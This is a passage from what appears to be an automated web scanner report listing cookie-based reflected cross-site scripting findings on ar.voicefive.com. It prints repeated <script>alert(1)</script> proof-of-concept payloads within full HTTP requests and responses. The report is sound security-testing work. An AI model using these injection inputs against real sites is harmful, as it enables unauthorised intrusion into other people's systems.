11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=13080105284fcdf<script>alert(1)</script>8ee39c256d0; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
X_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=13080105284fcdf<script>alert(1)</script>8ee39c256d0', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10
...[SNIP]...

3.63. http://ar.voicefive.com/bmx3/node.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload bf9fd<script>alert(1)</script>5110cef4cdd was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172bf9fd<script>alert(1)</script>5110cef4cdd

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
1794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172bf9fd<script>alert(1)</script>5110cef4cdd', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=130
...[SNIP]...

3.64. http://ar.voicefive.com/bmx3/node.pli [ar_p101866669 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p101866669 cookie is copied into the HTML document as plain text between tags. The payload 4a94d<script>alert(1)</script>10f1f070cd was submitted in the ar_p101866669 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&4a94d<script>alert(1)</script>10f1f070cd; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16067

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
n Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&4a94d<script>alert(1)</script>10f1f070cd', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:
...[SNIP]...

3.65. http://ar.voicefive.com/bmx3/node.pli [ar_p101945457 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p101945457 cookie is copied into the HTML document as plain text between tags. The payload c69ed<script>alert(1)</script>b2a148cde76 was submitted in the ar_p101945457 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&c69ed<script>alert(1)</script>b2a148cde76; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&c69ed<script>alert(1)</script>b2a148cde76', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p
...[SNIP]...

3.66. http://ar.voicefive.com/bmx3/node.pli [ar_p104567837 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p104567837 cookie is copied into the HTML document as plain text between tags. The payload 61147<script>alert(1)</script>c2a90b6c6b1 was submitted in the ar_p104567837 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&61147<script>alert(1)</script>c2a90b6c6b1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
ay 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&61147<script>alert(1)</script>c2a90b6c6b1', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10
...[SNIP]...

3.67. http://ar.voicefive.com/bmx3/node.pli [ar_p20101109 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p20101109 cookie is copied into the HTML document as plain text between tags. The payload 35b87<script>alert(1)</script>ece85987799 was submitted in the ar_p20101109 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&35b87<script>alert(1)</script>ece85987799; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
itExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&35b87<script>alert(1)</script>ece85987799', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC":
...[SNIP]...

3.68. http://ar.voicefive.com/bmx3/node.pli [ar_p56282763 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p56282763 cookie is copied into the HTML document as plain text between tags. The payload 8477b<script>alert(1)</script>014b6d8beb6 was submitted in the ar_p56282763 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&8477b<script>alert(1)</script>014b6d8beb6; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:34 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&8477b<script>alert(1)</script>014b6d8beb6', "UID": '4a757a7-24.143.206.42-1305663172', "BMX_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p
...[SNIP]...

3.69. http://ar.voicefive.com/bmx3/node.pli [ar_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 1e2f5<script>alert(1)</script>aaffd4b4831 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&1e2f5<script>alert(1)</script>aaffd4b4831; 